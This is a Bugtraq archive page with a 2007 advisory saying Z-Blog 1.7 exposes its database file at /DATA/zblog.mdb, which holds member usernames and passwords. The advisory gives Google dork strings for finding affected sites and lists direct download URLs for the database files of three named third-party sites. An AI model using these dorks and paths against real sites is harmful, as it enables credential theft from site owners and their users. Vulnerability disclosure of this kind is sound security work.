|
Bugtraq
mailing list archives
Z-Blog 1.7 Authentication Bypass Database Download Vulnerability
From: Raed () BsdMail Com
Date: 1 Jun 2007 11:19:38 -0000
* Author : Hasadya Raed
* Contact : RaeD () BsdMail Com ~>Israel Hacker
* Greetz : Fairoz :)
* Advisory : Z-Blog 1.7 Authentication Bypass/Database Download Vulnerability
* Script : Z-Blog 1.7
* Impact : Remote
* Googledork : "Powered by Z-Blog 1.7" , "Powered By Z-Blog 1.7 Laputa Build 70216"
* Download : http://bbs.rainbowsoft.org/attachment.php?aid=92
--/ REPRODUCE \--
# Attackers Can Authentication Bypass In This Product By Add The Following Files:
('/DATA/zblog.mdb') And Download The Database Which Contains Table Named [blog_Member]
The Users Names And Passwords Inside
--/ Examples \--
http://www.uistudio.cn/blog/DATA/zblog.mdb
http://www.kenyja.com/blog/DATA/zblog.mdb
http://www.netpub.cn/nffish/DATA/zblog.mdb
 By Date 
By Thread
Current thread:
- Z-Blog 1.7 Authentication Bypass Database Download Vulnerability Raed (Jun 01)
| 
Intro
